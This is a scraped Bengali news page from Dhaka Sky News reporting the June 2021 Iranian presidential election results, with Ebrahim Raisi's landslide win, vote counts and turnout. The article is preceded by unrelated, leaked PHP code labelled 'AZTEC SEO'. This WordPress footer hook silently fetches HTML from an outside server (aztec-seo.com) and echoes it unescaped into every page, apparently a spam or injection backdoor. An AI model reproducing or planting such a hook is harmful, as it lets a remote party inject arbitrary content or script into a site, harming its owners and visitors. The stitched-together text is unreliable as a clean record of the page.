/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); ইরানের প্রেসিডেন্ট নির্বাচনের চূড়ান্ত ফল ঘোষণা, রায়িসির ভূমিধস বিজয় | Dhaka Sky News

ইরানিদের প্রতিটি ভোট শত্রুদের কাছে যেন একেকটি ক্ষেপণাস্ত্র : আইআরজিসি প্রধান

আগের সংবাদ

ফিলিস্তিনিদের অধিকার রক্ষা করুন: বাইডেনকে ৬৮২ রাজনীতিক ও শিক্ষাবিদের আহ্বান

পরের সংবাদ

ইরানের প্রেসিডেন্ট নির্বাচনের চূড়ান্ত ফল ঘোষণা, রায়িসির ভূমিধস বিজয়

ঢাকা স্কাইনিউজ ডেস্ক

প্রকাশিত: June 19, 2021 , 9:21 pm

ইসলামি প্রজাতন্ত্র ইরানের ত্রয়োদশ প্রেসিডেন্ট নির্বাচনের স্বতন্ত্র প্রার্থী আয়াতুল্লাহ ড, সাইয়েদ ইব্রাহিম রায়িসি ভূমিধস বিজয় লাভ করেছেন। তিনি তার নিকটতম প্রতিদ্বন্দ্বী ড. মোহসেন রেজায়ীর চেয়ে ১ কোটি ৫৫ লাখ ভোট বেশি পেয়ে নির্বাচিত হয়েছেন।

ইরানের স্বরাষ্ট্রমন্ত্রী আব্দুর রেজা রাহমানি ফাজলি আজ বিকেলে এক সংবাদ সম্মেলনে এ তথ্য জানান। তিনি জানান, এবারের নির্বাচনে ৫ কোটি ৯৩ লাখ ১০ হাজার ৩০৭ ভোটারের মধ্যে ভোটাধিকার প্রয়োগ করেছেন ২ কোটি ৮৯ লাখ ৩ হাজার ৩০৪ জন। এর মধ্যে ইব্রাহিম রায়িসি পেয়েছেন ১ কোটি ৭৯ লাখ ২৬ হাজার ৩৪৫ ভোট। তার নিকটতম প্রতিদ্বন্দ্বী মোহসেন রেজায়ী পেয়েছেন ৩৪ লাখ ১২ হাজার ৭১২ ভোট। এছাড়া, আব্দুন নাসের হেম্মাতি ২৪ লাখ ২৭ হাজার ২০১ ভোট এবং সাইয়্যেদ আমির হোসেইন কাজিজাদেহ পেয়েছেন ৯ লাখ ৯৯ হাজার ৭১৮ ভোট।

নির্বাচনে ৪৮.৮ শতাংশ ভোট পড়েছে বলে ইরানের স্বরাষ্ট্রমন্ত্রী জানান। স্বরাষ্ট্র মন্ত্রণালয় জানিয়েছে, ইব্রাহিম রায়িসি পেয়েছেন প্রদত্ত ভোটের ৬১.৯ শতাংশ, মোহসেন রেজায়ী ১১.৭ ভাগ, আব্দুন নাসের হেম্মাতি ৮.৩ ভাগ এবং কাজিজাদেহ হাশেমি ৩.৪ ভাগ ভোট।

আনুষ্ঠানিকভাবে নির্বাচনের ফলাফল ঘোষিত হওয়ার আগেই সাইয়্যেদ ইব্রাহিম রায়িসিকে অভিনন্দন জানান তার তিন প্রতিদ্বন্দ্বী প্রার্থী। প্রেসিডেন্ট হাসান রুহানিও নবনির্বাচিত প্রেসিডেন্টকে অভিনন্দন জানিয়েছেন।

নির্বাচনের প্রার্থী হওয়ার আগ পর্যন্ত ইব্রাহিম রায়িসি ২০১৯ সাল থেকে ইরানের বিচার বিভাগের প্রধান হিসেবে দায়িত্ব পালন করে আসছিলেন। সূত্র : পার্সটুডে